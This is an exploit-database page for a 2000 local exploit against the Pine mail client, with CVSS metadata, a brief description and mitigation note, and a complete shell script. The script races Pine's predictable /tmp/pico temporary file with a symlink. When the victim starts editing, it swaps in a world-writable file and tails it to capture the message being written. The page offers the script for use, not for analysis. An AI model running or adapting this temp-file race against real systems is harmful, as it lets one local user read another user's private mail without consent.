header-logo
Suggest Exploit
vendor:
Pine
by:
milw0rm.com
7,2
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Pine
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2000

Grab local pine messages

This exploit allows an attacker to gain access to a user's pine messages by creating a symbolic link between the user's pine temporary file and a file of the attacker's choice. The attacker can then view the user's pine messages by tailing the file they created.

Mitigation:

Ensure that users are not running pine with the settings 'enable-alternate-editor-cmd' and 'enable-alternate-editor-implicitly' enabled. Additionally, ensure that the editor setting is not set to '/usr/bin/vi'.
Source

Exploit-DB raw data:

#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of pine process>
# victim pine must use following settings
#
#  mat@hacksware.com
#  http://hacksware.com
#
# [x]  enable-alternate-editor-cmd
# [x]  enable-alternate-editor-implicitly
# editor                   = /usr/bin/vi
#

PID=$1
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`
echo PICO_FILE is $PICO_FILE

#if $PICO_FILE and $TRASHCAN exists, remove them
if test -f $PICO_FILE
then
 rm -f $PICO_FILE
fi
if test -f $TRASHCAN
then
 rm -f $TRASHCAN
fi

ln -s $TRASHCAN $PICO_FILE
while :
do
 if test -f $TRASHCAN
 then
  break
 fi
done

echo Victim is Editing Pine Message
rm -f $PICO_FILE
echo We replace temporary file
touch $PICO_FILE
chmod 777 $PICO_FILE
echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f $PICO_FILE


# milw0rm.com [2000-12-15]